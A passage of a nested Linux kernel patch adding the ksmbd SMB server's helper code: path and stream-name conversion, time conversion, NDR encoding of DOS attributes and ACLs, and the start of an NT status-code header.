++		ksmbd_debug(SMB, "stream name : %s, stream type : %s\n", s_name,
++			    stream_type);
++		if (!strncasecmp("$data", stream_type, 5))
++			*s_type = DATA_STREAM;
++		else if (!strncasecmp("$index_allocation", stream_type, 17))
++			*s_type = DIR_STREAM;
++		else
++			rc = -ENOENT;
++	}
++
++	*stream_name = s_name;
++out:
++	return rc;
++}
++
++/**
++ * convert_to_nt_pathname() - extract and return windows path string
++ *      whose share directory prefix was removed from file path
++ * @share: ksmbd_share_config pointer
++ * @path: path to report
++ *
++ * Return : windows path string or error
++ */
++
++char *convert_to_nt_pathname(struct ksmbd_share_config *share,
++			     const struct path *path)
++{
++	char *pathname, *ab_pathname, *nt_pathname;
++	int share_path_len = share->path_sz;
++
++	pathname = kmalloc(PATH_MAX, GFP_KERNEL);
++	if (!pathname)
++		return ERR_PTR(-EACCES);
++
++	ab_pathname = d_path(path, pathname, PATH_MAX);
++	if (IS_ERR(ab_pathname)) {
++		nt_pathname = ERR_PTR(-EACCES);
++		goto free_pathname;
++	}
++
++	if (strncmp(ab_pathname, share->path, share_path_len)) {
++		nt_pathname = ERR_PTR(-EACCES);
++		goto free_pathname;
++	}
++
++	nt_pathname = kzalloc(strlen(&ab_pathname[share_path_len]) + 2, GFP_KERNEL);
++	if (!nt_pathname) {
++		nt_pathname = ERR_PTR(-ENOMEM);
++		goto free_pathname;
++	}
++	if (ab_pathname[share_path_len] == '\0')
++		strcpy(nt_pathname, "/");
++	strcat(nt_pathname, &ab_pathname[share_path_len]);
++
++	ksmbd_conv_path_to_windows(nt_pathname);
++
++free_pathname:
++	kfree(pathname);
++	return nt_pathname;
++}
++
++int get_nlink(struct kstat *st)
++{
++	int nlink;
++
++	nlink = st->nlink;
++	if (S_ISDIR(st->mode))
++		nlink--;
++
++	return nlink;
++}
++
++void ksmbd_conv_path_to_unix(char *path)
++{
++	strreplace(path, '\\', '/');
++}
++
++void ksmbd_strip_last_slash(char *path)
++{
++	int len = strlen(path);
++
++	while (len && path[len - 1] == '/') {
++		path[len - 1] = '\0';
++		len--;
++	}
++}
++
++void ksmbd_conv_path_to_windows(char *path)
++{
++	strreplace(path, '/', '\\');
++}
++
++char *ksmbd_casefold_sharename(struct unicode_map *um, const char *name)
++{
++	char *cf_name;
++	int cf_len;
++
++	cf_name = kzalloc(KSMBD_REQ_MAX_SHARE_NAME, GFP_KERNEL);
++	if (!cf_name)
++		return ERR_PTR(-ENOMEM);
++
++	if (IS_ENABLED(CONFIG_UNICODE) && um) {
++		const struct qstr q_name = {.name = name, .len = strlen(name)};
++
++		cf_len = utf8_casefold(um, &q_name, cf_name,
++				       KSMBD_REQ_MAX_SHARE_NAME);
++		if (cf_len < 0)
++			goto out_ascii;
++
++		return cf_name;
++	}
++
++out_ascii:
++	cf_len = strscpy(cf_name, name, KSMBD_REQ_MAX_SHARE_NAME);
++	if (cf_len < 0) {
++		kfree(cf_name);
++		return ERR_PTR(-E2BIG);
++	}
++
++	for (; *cf_name; ++cf_name)
++		*cf_name = isascii(*cf_name) ? tolower(*cf_name) : *cf_name;
++	return cf_name - cf_len;
++}
++
++/**
++ * ksmbd_extract_sharename() - get share name from tree connect request
++ * @treename:	buffer containing tree name and share name
++ *
++ * Return:      share name on success, otherwise error
++ */
++char *ksmbd_extract_sharename(struct unicode_map *um, const char *treename)
++{
++	const char *name = treename, *pos = strrchr(name, '\\');
++
++	if (pos)
++		name = (pos + 1);
++
++	/* caller has to free the memory */
++	return ksmbd_casefold_sharename(um, name);
++}
++
++/**
++ * convert_to_unix_name() - convert windows name to unix format
++ * @share:	ksmbd_share_config pointer
++ * @name:	file name that is relative to share
++ *
++ * Return:	converted name on success, otherwise NULL
++ */
++char *convert_to_unix_name(struct ksmbd_share_config *share, const char *name)
++{
++	int no_slash = 0, name_len, path_len;
++	char *new_name;
++
++	if (name[0] == '/')
++		name++;
++
++	path_len = share->path_sz;
++	name_len = strlen(name);
++	new_name = kmalloc(path_len + name_len + 2, GFP_KERNEL);
++	if (!new_name)
++		return new_name;
++
++	memcpy(new_name, share->path, path_len);
++	if (new_name[path_len - 1] != '/') {
++		new_name[path_len] = '/';
++		no_slash = 1;
++	}
++
++	memcpy(new_name + path_len + no_slash, name, name_len);
++	path_len += name_len + no_slash;
++	new_name[path_len] = 0x00;
++	return new_name;
++}
++
++char *ksmbd_convert_dir_info_name(struct ksmbd_dir_info *d_info,
++				  const struct nls_table *local_nls,
++				  int *conv_len)
++{
++	char *conv;
++	int  sz = min(4 * d_info->name_len, PATH_MAX);
++
++	if (!sz)
++		return NULL;
++
++	conv = kmalloc(sz, GFP_KERNEL);
++	if (!conv)
++		return NULL;
++
++	/* XXX */
++	*conv_len = smbConvertToUTF16((__le16 *)conv, d_info->name,
++				      d_info->name_len, local_nls, 0);
++	*conv_len *= 2;
++
++	/* We allocate buffer twice bigger than needed. */
++	conv[*conv_len] = 0x00;
++	conv[*conv_len + 1] = 0x00;
++	return conv;
++}
++
++/*
++ * Convert the NT UTC (based 1601-01-01, in hundred nanosecond units)
++ * into Unix UTC (based 1970-01-01, in seconds).
++ */
++struct timespec64 ksmbd_NTtimeToUnix(__le64 ntutc)
++{
++	struct timespec64 ts;
++
++	/* Subtract the NTFS time offset, then convert to 1s intervals. */
++	s64 t = le64_to_cpu(ntutc) - NTFS_TIME_OFFSET;
++	u64 abs_t;
++
++	/*
++	 * Unfortunately can not use normal 64 bit division on 32 bit arch, but
++	 * the alternative, do_div, does not work with negative numbers so have
++	 * to special case them
++	 */
++	if (t < 0) {
++		abs_t = -t;
++		ts.tv_nsec = do_div(abs_t, 10000000) * 100;
++		ts.tv_nsec = -ts.tv_nsec;
++		ts.tv_sec = -abs_t;
++	} else {
++		abs_t = t;
++		ts.tv_nsec = do_div(abs_t, 10000000) * 100;
++		ts.tv_sec = abs_t;
++	}
++
++	return ts;
++}
++
++/* Convert the Unix UTC into NT UTC. */
++inline u64 ksmbd_UnixTimeToNT(struct timespec64 t)
++{
++	/* Convert to 100ns intervals and then add the NTFS time offset. */
++	return (u64)t.tv_sec * 10000000 + t.tv_nsec / 100 + NTFS_TIME_OFFSET;
++}
++
++inline long long ksmbd_systime(void)
++{
++	struct timespec64	ts;
++
++	ktime_get_real_ts64(&ts);
++	return ksmbd_UnixTimeToNT(ts);
++}
+diff --git a/fs/smb/server/misc.h b/fs/smb/server/misc.h
+new file mode 100644
+index 0000000000000..1facfcd21200f
+--- /dev/null
++++ b/fs/smb/server/misc.h
+@@ -0,0 +1,37 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __KSMBD_MISC_H__
++#define __KSMBD_MISC_H__
++
++struct ksmbd_share_config;
++struct nls_table;
++struct kstat;
++struct ksmbd_file;
++
++int match_pattern(const char *str, size_t len, const char *pattern);
++int ksmbd_validate_filename(char *filename);
++int parse_stream_name(char *filename, char **stream_name, int *s_type);
++char *convert_to_nt_pathname(struct ksmbd_share_config *share,
++			     const struct path *path);
++int get_nlink(struct kstat *st);
++void ksmbd_conv_path_to_unix(char *path);
++void ksmbd_strip_last_slash(char *path);
++void ksmbd_conv_path_to_windows(char *path);
++char *ksmbd_casefold_sharename(struct unicode_map *um, const char *name);
++char *ksmbd_extract_sharename(struct unicode_map *um, const char *treename);
++char *convert_to_unix_name(struct ksmbd_share_config *share, const char *name);
++
++#define KSMBD_DIR_INFO_ALIGNMENT	8
++struct ksmbd_dir_info;
++char *ksmbd_convert_dir_info_name(struct ksmbd_dir_info *d_info,
++				  const struct nls_table *local_nls,
++				  int *conv_len);
++
++#define NTFS_TIME_OFFSET	((u64)(369 * 365 + 89) * 24 * 3600 * 10000000)
++struct timespec64 ksmbd_NTtimeToUnix(__le64 ntutc);
++u64 ksmbd_UnixTimeToNT(struct timespec64 t);
++long long ksmbd_systime(void);
++#endif /* __KSMBD_MISC_H__ */
+diff --git a/fs/smb/server/ndr.c b/fs/smb/server/ndr.c
+new file mode 100644
+index 0000000000000..4d9e0b54e3dbf
+--- /dev/null
++++ b/fs/smb/server/ndr.c
+@@ -0,0 +1,514 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2021 Samsung Electronics Co., Ltd.
++ *   Author(s): Namjae Jeon <linkinjeon@kernel.org>
++ */
++
++#include <linux/fs.h>
++
++#include "glob.h"
++#include "ndr.h"
++
++static inline char *ndr_get_field(struct ndr *n)
++{
++	return n->data + n->offset;
++}
++
++static int try_to_realloc_ndr_blob(struct ndr *n, size_t sz)
++{
++	char *data;
++
++	data = krealloc(n->data, n->offset + sz + 1024, GFP_KERNEL);
++	if (!data)
++		return -ENOMEM;
++
++	n->data = data;
++	n->length += 1024;
++	memset(n->data + n->offset, 0, 1024);
++	return 0;
++}
++
++static int ndr_write_int16(struct ndr *n, __u16 value)
++{
++	if (n->length <= n->offset + sizeof(value)) {
++		int ret;
++
++		ret = try_to_realloc_ndr_blob(n, sizeof(value));
++		if (ret)
++			return ret;
++	}
++
++	*(__le16 *)ndr_get_field(n) = cpu_to_le16(value);
++	n->offset += sizeof(value);
++	return 0;
++}
++
++static int ndr_write_int32(struct ndr *n, __u32 value)
++{
++	if (n->length <= n->offset + sizeof(value)) {
++		int ret;
++
++		ret = try_to_realloc_ndr_blob(n, sizeof(value));
++		if (ret)
++			return ret;
++	}
++
++	*(__le32 *)ndr_get_field(n) = cpu_to_le32(value);
++	n->offset += sizeof(value);
++	return 0;
++}
++
++static int ndr_write_int64(struct ndr *n, __u64 value)
++{
++	if (n->length <= n->offset + sizeof(value)) {
++		int ret;
++
++		ret = try_to_realloc_ndr_blob(n, sizeof(value));
++		if (ret)
++			return ret;
++	}
++
++	*(__le64 *)ndr_get_field(n) = cpu_to_le64(value);
++	n->offset += sizeof(value);
++	return 0;
++}
++
++static int ndr_write_bytes(struct ndr *n, void *value, size_t sz)
++{
++	if (n->length <= n->offset + sz) {
++		int ret;
++
++		ret = try_to_realloc_ndr_blob(n, sz);
++		if (ret)
++			return ret;
++	}
++
++	memcpy(ndr_get_field(n), value, sz);
++	n->offset += sz;
++	return 0;
++}
++
++static int ndr_write_string(struct ndr *n, char *value)
++{
++	size_t sz;
++
++	sz = strlen(value) + 1;
++	if (n->length <= n->offset + sz) {
++		int ret;
++
++		ret = try_to_realloc_ndr_blob(n, sz);
++		if (ret)
++			return ret;
++	}
++
++	memcpy(ndr_get_field(n), value, sz);
++	n->offset += sz;
++	n->offset = ALIGN(n->offset, 2);
++	return 0;
++}
++
++static int ndr_read_string(struct ndr *n, void *value, size_t sz)
++{
++	int len;
++
++	if (n->offset + sz > n->length)
++		return -EINVAL;
++
++	len = strnlen(ndr_get_field(n), sz);
++	if (value)
++		memcpy(value, ndr_get_field(n), len);
++	len++;
++	n->offset += len;
++	n->offset = ALIGN(n->offset, 2);
++	return 0;
++}
++
++static int ndr_read_bytes(struct ndr *n, void *value, size_t sz)
++{
++	if (n->offset + sz > n->length)
++		return -EINVAL;
++
++	if (value)
++		memcpy(value, ndr_get_field(n), sz);
++	n->offset += sz;
++	return 0;
++}
++
++static int ndr_read_int16(struct ndr *n, __u16 *value)
++{
++	if (n->offset + sizeof(__u16) > n->length)
++		return -EINVAL;
++
++	if (value)
++		*value = le16_to_cpu(*(__le16 *)ndr_get_field(n));
++	n->offset += sizeof(__u16);
++	return 0;
++}
++
++static int ndr_read_int32(struct ndr *n, __u32 *value)
++{
++	if (n->offset + sizeof(__u32) > n->length)
++		return -EINVAL;
++
++	if (value)
++		*value = le32_to_cpu(*(__le32 *)ndr_get_field(n));
++	n->offset += sizeof(__u32);
++	return 0;
++}
++
++static int ndr_read_int64(struct ndr *n, __u64 *value)
++{
++	if (n->offset + sizeof(__u64) > n->length)
++		return -EINVAL;
++
++	if (value)
++		*value = le64_to_cpu(*(__le64 *)ndr_get_field(n));
++	n->offset += sizeof(__u64);
++	return 0;
++}
++
++int ndr_encode_dos_attr(struct ndr *n, struct xattr_dos_attrib *da)
++{
++	char hex_attr[12] = {0};
++	int ret;
++
++	n->offset = 0;
++	n->length = 1024;
++	n->data = kzalloc(n->length, GFP_KERNEL);
++	if (!n->data)
++		return -ENOMEM;
++
++	if (da->version == 3) {
++		snprintf(hex_attr, 10, "0x%x", da->attr);
++		ret = ndr_write_string(n, hex_attr);
++	} else {
++		ret = ndr_write_string(n, "");
++	}
++	if (ret)
++		return ret;
++
++	ret = ndr_write_int16(n, da->version);
++	if (ret)
++		return ret;
++
++	ret = ndr_write_int32(n, da->version);
++	if (ret)
++		return ret;
++
++	ret = ndr_write_int32(n, da->flags);
++	if (ret)
++		return ret;
++
++	ret = ndr_write_int32(n, da->attr);
++	if (ret)
++		return ret;
++
++	if (da->version == 3) {
++		ret = ndr_write_int32(n, da->ea_size);
++		if (ret)
++			return ret;
++		ret = ndr_write_int64(n, da->size);
++		if (ret)
++			return ret;
++		ret = ndr_write_int64(n, da->alloc_size);
++	} else {
++		ret = ndr_write_int64(n, da->itime);
++	}
++	if (ret)
++		return ret;
++
++	ret = ndr_write_int64(n, da->create_time);
++	if (ret)
++		return ret;
++
++	if (da->version == 3)
++		ret = ndr_write_int64(n, da->change_time);
++	return ret;
++}
++
++int ndr_decode_dos_attr(struct ndr *n, struct xattr_dos_attrib *da)
++{
++	char hex_attr[12];
++	unsigned int version2;
++	int ret;
++
++	n->offset = 0;
++	ret = ndr_read_string(n, hex_attr, sizeof(hex_attr));
++	if (ret)
++		return ret;
++
++	ret = ndr_read_int16(n, &da->version);
++	if (ret)
++		return ret;
++
++	if (da->version != 3 && da->version != 4) {
++		ksmbd_debug(VFS, "v%d version is not supported\n", da->version);
++		return -EINVAL;
++	}
++
++	ret = ndr_read_int32(n, &version2);
++	if (ret)
++		return ret;
++
++	if (da->version != version2) {
++		ksmbd_debug(VFS, "ndr version mismatched(version: %d, version2: %d)\n",
++		       da->version, version2);
++		return -EINVAL;
++	}
++
++	ret = ndr_read_int32(n, NULL);
++	if (ret)
++		return ret;
++
++	ret = ndr_read_int32(n, &da->attr);
++	if (ret)
++		return ret;
++
++	if (da->version == 4) {
++		ret = ndr_read_int64(n, &da->itime);
++		if (ret)
++			return ret;
++
++		ret = ndr_read_int64(n, &da->create_time);
++	} else {
++		ret = ndr_read_int32(n, NULL);
++		if (ret)
++			return ret;
++
++		ret = ndr_read_int64(n, NULL);
++		if (ret)
++			return ret;
++
++		ret = ndr_read_int64(n, NULL);
++		if (ret)
++			return ret;
++
++		ret = ndr_read_int64(n, &da->create_time);
++		if (ret)
++			return ret;
++
++		ret = ndr_read_int64(n, NULL);
++	}
++
++	return ret;
++}
++
++static int ndr_encode_posix_acl_entry(struct ndr *n, struct xattr_smb_acl *acl)
++{
++	int i, ret;
++
++	ret = ndr_write_int32(n, acl->count);
++	if (ret)
++		return ret;
++
++	n->offset = ALIGN(n->offset, 8);
++	ret = ndr_write_int32(n, acl->count);
++	if (ret)
++		return ret;
++
++	ret = ndr_write_int32(n, 0);
++	if (ret)
++		return ret;
++
++	for (i = 0; i < acl->count; i++) {
++		n->offset = ALIGN(n->offset, 8);
++		ret = ndr_write_int16(n, acl->entries[i].type);
++		if (ret)
++			return ret;
++
++		ret = ndr_write_int16(n, acl->entries[i].type);
++		if (ret)
++			return ret;
++
++		if (acl->entries[i].type == SMB_ACL_USER) {
++			n->offset = ALIGN(n->offset, 8);
++			ret = ndr_write_int64(n, acl->entries[i].uid);
++		} else if (acl->entries[i].type == SMB_ACL_GROUP) {
++			n->offset = ALIGN(n->offset, 8);
++			ret = ndr_write_int64(n, acl->entries[i].gid);
++		}
++		if (ret)
++			return ret;
++
++		/* push permission */
++		ret = ndr_write_int32(n, acl->entries[i].perm);
++	}
++
++	return ret;
++}
++
++int ndr_encode_posix_acl(struct ndr *n,
++			 struct user_namespace *user_ns,
++			 struct inode *inode,
++			 struct xattr_smb_acl *acl,
++			 struct xattr_smb_acl *def_acl)
++{
++	unsigned int ref_id = 0x00020000;
++	int ret;
++	vfsuid_t vfsuid;
++	vfsgid_t vfsgid;
++
++	n->offset = 0;
++	n->length = 1024;
++	n->data = kzalloc(n->length, GFP_KERNEL);
++	if (!n->data)
++		return -ENOMEM;
++
++	if (acl) {
++		/* ACL ACCESS */
++		ret = ndr_write_int32(n, ref_id);
++		ref_id += 4;
++	} else {
++		ret = ndr_write_int32(n, 0);
++	}
++	if (ret)
++		return ret;
++
++	if (def_acl) {
++		/* DEFAULT ACL ACCESS */
++		ret = ndr_write_int32(n, ref_id);
++		ref_id += 4;
++	} else {
++		ret = ndr_write_int32(n, 0);
++	}
++	if (ret)
++		return ret;
++
++	vfsuid = i_uid_into_vfsuid(user_ns, inode);
++	ret = ndr_write_int64(n, from_kuid(&init_user_ns, vfsuid_into_kuid(vfsuid)));
++	if (ret)
++		return ret;
++	vfsgid = i_gid_into_vfsgid(user_ns, inode);
++	ret = ndr_write_int64(n, from_kgid(&init_user_ns, vfsgid_into_kgid(vfsgid)));
++	if (ret)
++		return ret;
++	ret = ndr_write_int32(n, inode->i_mode);
++	if (ret)
++		return ret;
++
++	if (acl) {
++		ret = ndr_encode_posix_acl_entry(n, acl);
++		if (def_acl && !ret)
++			ret = ndr_encode_posix_acl_entry(n, def_acl);
++	}
++	return ret;
++}
++
++int ndr_encode_v4_ntacl(struct ndr *n, struct xattr_ntacl *acl)
++{
++	unsigned int ref_id = 0x00020004;
++	int ret;
++
++	n->offset = 0;
++	n->length = 2048;
++	n->data = kzalloc(n->length, GFP_KERNEL);
++	if (!n->data)
++		return -ENOMEM;
++
++	ret = ndr_write_int16(n, acl->version);
++	if (ret)
++		return ret;
++
++	ret = ndr_write_int32(n, acl->version);
++	if (ret)
++		return ret;
++
++	ret = ndr_write_int16(n, 2);
++	if (ret)
++		return ret;
++
++	ret = ndr_write_int32(n, ref_id);
++	if (ret)
++		return ret;
++
++	/* push hash type and hash 64bytes */
++	ret = ndr_write_int16(n, acl->hash_type);
++	if (ret)
++		return ret;
++
++	ret = ndr_write_bytes(n, acl->hash, XATTR_SD_HASH_SIZE);
++	if (ret)
++		return ret;
++
++	ret = ndr_write_bytes(n, acl->desc, acl->desc_len);
++	if (ret)
++		return ret;
++
++	ret = ndr_write_int64(n, acl->current_time);
++	if (ret)
++		return ret;
++
++	ret = ndr_write_bytes(n, acl->posix_acl_hash, XATTR_SD_HASH_SIZE);
++	if (ret)
++		return ret;
++
++	/* push ndr for security descriptor */
++	ret = ndr_write_bytes(n, acl->sd_buf, acl->sd_size);
++	return ret;
++}
++
++int ndr_decode_v4_ntacl(struct ndr *n, struct xattr_ntacl *acl)
++{
++	unsigned int version2;
++	int ret;
++
++	n->offset = 0;
++	ret = ndr_read_int16(n, &acl->version);
++	if (ret)
++		return ret;
++	if (acl->version != 4) {
++		ksmbd_debug(VFS, "v%d version is not supported\n", acl->version);
++		return -EINVAL;
++	}
++
++	ret = ndr_read_int32(n, &version2);
++	if (ret)
++		return ret;
++	if (acl->version != version2) {
++		ksmbd_debug(VFS, "ndr version mismatched(version: %d, version2: %d)\n",
++		       acl->version, version2);
++		return -EINVAL;
++	}
++
++	/* Read Level */
++	ret = ndr_read_int16(n, NULL);
++	if (ret)
++		return ret;
++
++	/* Read Ref Id */
++	ret = ndr_read_int32(n, NULL);
++	if (ret)
++		return ret;
++
++	ret = ndr_read_int16(n, &acl->hash_type);
++	if (ret)
++		return ret;
++
++	ret = ndr_read_bytes(n, acl->hash, XATTR_SD_HASH_SIZE);
++	if (ret)
++		return ret;
++
++	ndr_read_bytes(n, acl->desc, 10);
++	if (strncmp(acl->desc, "posix_acl", 9)) {
++		pr_err("Invalid acl description : %s\n", acl->desc);
++		return -EINVAL;
++	}
++
++	/* Read Time */
++	ret = ndr_read_int64(n, NULL);
++	if (ret)
++		return ret;
++
++	/* Read Posix ACL hash */
++	ret = ndr_read_bytes(n, acl->posix_acl_hash, XATTR_SD_HASH_SIZE);
++	if (ret)
++		return ret;
++
++	acl->sd_size = n->length - n->offset;
++	acl->sd_buf = kzalloc(acl->sd_size, GFP_KERNEL);
++	if (!acl->sd_buf)
++		return -ENOMEM;
++
++	ret = ndr_read_bytes(n, acl->sd_buf, acl->sd_size);
++	return ret;
++}
+diff --git a/fs/smb/server/ndr.h b/fs/smb/server/ndr.h
+new file mode 100644
+index 0000000000000..60ca265d1bb01
+--- /dev/null
++++ b/fs/smb/server/ndr.h
+@@ -0,0 +1,22 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2020 Samsung Electronics Co., Ltd.
++ *   Author(s): Namjae Jeon <linkinjeon@kernel.org>
++ */
++
++struct ndr {
++	char	*data;
++	int	offset;
++	int	length;
++};
++
++#define NDR_NTSD_OFFSETOF	0xA0
++
++int ndr_encode_dos_attr(struct ndr *n, struct xattr_dos_attrib *da);
++int ndr_decode_dos_attr(struct ndr *n, struct xattr_dos_attrib *da);
++int ndr_encode_posix_acl(struct ndr *n, struct user_namespace *user_ns,
++			 struct inode *inode, struct xattr_smb_acl *acl,
++			 struct xattr_smb_acl *def_acl);
++int ndr_encode_v4_ntacl(struct ndr *n, struct xattr_ntacl *acl);
++int ndr_encode_v3_ntacl(struct ndr *n, struct xattr_ntacl *acl);
++int ndr_decode_v4_ntacl(struct ndr *n, struct xattr_ntacl *acl);
+diff --git a/fs/smb/server/nterr.h b/fs/smb/server/nterr.h
+new file mode 100644
+index 0000000000000..2f358f88a0188
+--- /dev/null
++++ b/fs/smb/server/nterr.h
+@@ -0,0 +1,543 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ * Unix SMB/Netbios implementation.
++ * Version 1.9.
++ * NT error code constants
++ * Copyright (C) Andrew Tridgell              1992-2000
++ * Copyright (C) John H Terpstra              1996-2000
++ * Copyright (C) Luke Kenneth Casson Leighton 1996-2000
++ * Copyright (C) Paul Ashton                  1998-2000
++ */
++
++#ifndef _NTERR_H
++#define _NTERR_H
++
++/* Win32 Status codes. */
++#define NT_STATUS_MORE_ENTRIES         0x0105
++#define NT_ERROR_INVALID_PARAMETER     0x0057
++#define NT_ERROR_INSUFFICIENT_BUFFER   0x007a
++#define NT_STATUS_1804                 0x070c
++#define NT_STATUS_NOTIFY_ENUM_DIR      0x010c
++#define NT_STATUS_INVALID_LOCK_RANGE   (0xC0000000 | 0x01a1)
++/*
++ * Win32 Error codes extracted using a loop in smbclient then printing a netmon
++ * sniff to a file.
++ */
++
++#define NT_STATUS_OK                   0x0000
++#define NT_STATUS_SOME_UNMAPPED        0x0107
++#define NT_STATUS_BUFFER_OVERFLOW  0x80000005
++#define NT_STATUS_NO_MORE_ENTRIES  0x8000001a
++#define NT_STATUS_MEDIA_CHANGED    0x8000001c
++#define NT_STATUS_END_OF_MEDIA     0x8000001e
++#define NT_STATUS_MEDIA_CHECK      0x80000020
++#define NT_STATUS_NO_DATA_DETECTED 0x8000001c
++#define NT_STATUS_STOPPED_ON_SYMLINK 0x8000002d
++#define NT_STATUS_DEVICE_REQUIRES_CLEANING 0x80000288
++#define NT_STATUS_DEVICE_DOOR_OPEN 0x80000288
++#define NT_STATUS_UNSUCCESSFUL (0xC0000000 | 0x0001)
++#define NT_STATUS_NOT_IMPLEMENTED (0xC0000000 | 0x0002)
++#define NT_STATUS_INVALID_INFO_CLASS (0xC0000000 | 0x0003)
++#define NT_STATUS_INFO_LENGTH_MISMATCH (0xC0000000 | 0x0004)
++#define NT_STATUS_ACCESS_VIOLATION (0xC0000000 | 0x0005)
++#define NT_STATUS_IN_PAGE_ERROR (0xC0000000 | 0x0006)
++#define NT_STATUS_PAGEFILE_QUOTA (0xC0000000 | 0x0007)
++#define NT_STATUS_INVALID_HANDLE (0xC0000000 | 0x0008)
++#define NT_STATUS_BAD_INITIAL_STACK (0xC0000000 | 0x0009)
++#define NT_STATUS_BAD_INITIAL_PC (0xC0000000 | 0x000a)
++#define NT_STATUS_INVALID_CID (0xC0000000 | 0x000b)
++#define NT_STATUS_TIMER_NOT_CANCELED (0xC0000000 | 0x000c)
++#define NT_STATUS_INVALID_PARAMETER (0xC0000000 | 0x000d)
++#define NT_STATUS_NO_SUCH_DEVICE (0xC0000000 | 0x000e)
++#define NT_STATUS_NO_SUCH_FILE (0xC0000000 | 0x000f)
++#define NT_STATUS_INVALID_DEVICE_REQUEST (0xC0000000 | 0x0010)
++#define NT_STATUS_END_OF_FILE (0xC0000000 | 0x0011)
++#define NT_STATUS_WRONG_VOLUME (0xC0000000 | 0x0012)
++#define NT_STATUS_NO_MEDIA_IN_DEVICE (0xC0000000 | 0x0013)
++#define NT_STATUS_UNRECOGNIZED_MEDIA (0xC0000000 | 0x0014)
++#define NT_STATUS_NONEXISTENT_SECTOR (0xC0000000 | 0x0015)
++#define NT_STATUS_MORE_PROCESSING_REQUIRED (0xC0000000 | 0x0016)
++#define NT_STATUS_NO_MEMORY (0xC0000000 | 0x0017)
++#define NT_STATUS_CONFLICTING_ADDRESSES (0xC0000000 | 0x0018)
++#define NT_STATUS_NOT_MAPPED_VIEW (0xC0000000 | 0x0019)
++#define NT_STATUS_UNABLE_TO_FREE_VM (0x80000000 | 0x001a)
++#define NT_STATUS_UNABLE_TO_DELETE_SECTION (0xC0000000 | 0x001b)
++#define NT_STATUS_INVALID_SYSTEM_SERVICE (0xC0000000 | 0x001c)
++#define NT_STATUS_ILLEGAL_INSTRUCTION (0xC0000000 | 0x001d)
++#define NT_STATUS_INVALID_LOCK_SEQUENCE (0xC0000000 | 0x001e)
++#define NT_STATUS_INVALID_VIEW_SIZE (0xC0000000 | 0x001f)
++#define NT_STATUS_INVALID_FILE_FOR_SECTION (0xC0000000 | 0x0020)
++#define NT_STATUS_ALREADY_COMMITTED (0xC0000000 | 0x0021)
++#define NT_STATUS_ACCESS_DENIED (0xC0000000 | 0x0022)
++#define NT_STATUS_BUFFER_TOO_SMALL (0xC0000000 | 0x0023)
++#define NT_STATUS_OBJECT_TYPE_MISMATCH (0xC0000000 | 0x0024)
++#define NT_STATUS_NONCONTINUABLE_EXCEPTION (0xC0000000 | 0x0025)
++#define NT_STATUS_INVALID_DISPOSITION (0xC0000000 | 0x0026)
++#define NT_STATUS_UNWIND (0xC0000000 | 0x0027)
++#define NT_STATUS_BAD_STACK (0xC0000000 | 0x0028)
++#define NT_STATUS_INVALID_UNWIND_TARGET (0xC0000000 | 0x0029)
++#define NT_STATUS_NOT_LOCKED (0xC0000000 | 0x002a)
++#define NT_STATUS_PARITY_ERROR (0xC0000000 | 0x002b)
++#define NT_STATUS_UNABLE_TO_DECOMMIT_VM (0xC0000000 | 0x002c)
++#define NT_STATUS_NOT_COMMITTED (0xC0000000 | 0x002d)
++#define NT_STATUS_INVALID_PORT_ATTRIBUTES (0xC0000000 | 0x002e)
++#define NT_STATUS_PORT_MESSAGE_TOO_LONG (0xC0000000 | 0x002f)
++#define NT_STATUS_INVALID_PARAMETER_MIX (0xC0000000 | 0x0030)
++#define NT_STATUS_INVALID_QUOTA_LOWER (0xC0000000 | 0x0031)
++#define NT_STATUS_DISK_CORRUPT_ERROR (0xC0000000 | 0x0032)
++#define NT_STATUS_OBJECT_NAME_INVALID (0xC0000000 | 0x0033)
++#define NT_STATUS_OBJECT_NAME_NOT_FOUND (0xC0000000 | 0x0034)
++#define NT_STATUS_OBJECT_NAME_COLLISION (0xC0000000 | 0x0035)
++#define NT_STATUS_HANDLE_NOT_WAITABLE (0xC0000000 | 0x0036)
++#define NT_STATUS_PORT_DISCONNECTED (0xC0000000 | 0x0037)
++#define NT_STATUS_DEVICE_ALREADY_ATTACHED (0xC0000000 | 0x0038)
++#define NT_STATUS_OBJECT_PATH_INVALID (0xC0000000 | 0x0039)
++#define NT_STATUS_OBJECT_PATH_NOT_FOUND (0xC0000000 | 0x003a)
++#define NT_STATUS_OBJECT_PATH_SYNTAX_BAD (0xC0000000 | 0x003b)
++#define NT_STATUS_DATA_OVERRUN (0xC0000000 | 0x003c)
++#define NT_STATUS_DATA_LATE_ERROR (0xC0000000 | 0x003d)
++#define NT_STATUS_DATA_ERROR (0xC0000000 | 0x003e)
++#define NT_STATUS_CRC_ERROR (0xC0000000 | 0x003f)
++#define NT_STATUS_SECTION_TOO_BIG (0xC0000000 | 0x0040)
++#define NT_STATUS_PORT_CONNECTION_REFUSED (0xC0000000 | 0x0041)
++#define NT_STATUS_INVALID_PORT_HANDLE (0xC0000000 | 0x0042)
++#define NT_STATUS_SHARING_VIOLATION (0xC0000000 | 0x0043)
++#define NT_STATUS_QUOTA_EXCEEDED (0xC0000000 | 0x0044)
++#define NT_STATUS_INVALID_PAGE_PROTECTION (0xC0000000 | 0x0045)
++#define NT_STATUS_MUTANT_NOT_OWNED (0xC0000000 | 0x0046)
++#define NT_STATUS_SEMAPHORE_LIMIT_EXCEEDED (0xC0000000 | 0x0047)
++#define NT_STATUS_PORT_ALREADY_SET (0xC0000000 | 0x0048)
++#define NT_STATUS_SECTION_NOT_IMAGE (0xC0000000 | 0x0049)
++#define NT_STATUS_SUSPEND_COUNT_EXCEEDED (0xC0000000 | 0x004a)
++#define NT_STATUS_THREAD_IS_TERMINATING (0xC0000000 | 0x004b)
++#define NT_STATUS_BAD_WORKING_SET_LIMIT (0xC0000000 | 0x004c)
++#define NT_STATUS_INCOMPATIBLE_FILE_MAP (0xC0000000 | 0x004d)
++#define NT_STATUS_SECTION_PROTECTION (0xC0000000 | 0x004e)
++#define NT_STATUS_EAS_NOT_SUPPORTED (0xC0000000 | 0x004f)
++#define NT_STATUS_EA_TOO_LARGE (0xC0000000 | 0x0050)
++#define NT_STATUS_NONEXISTENT_EA_ENTRY (0xC0000000 | 0x0051)
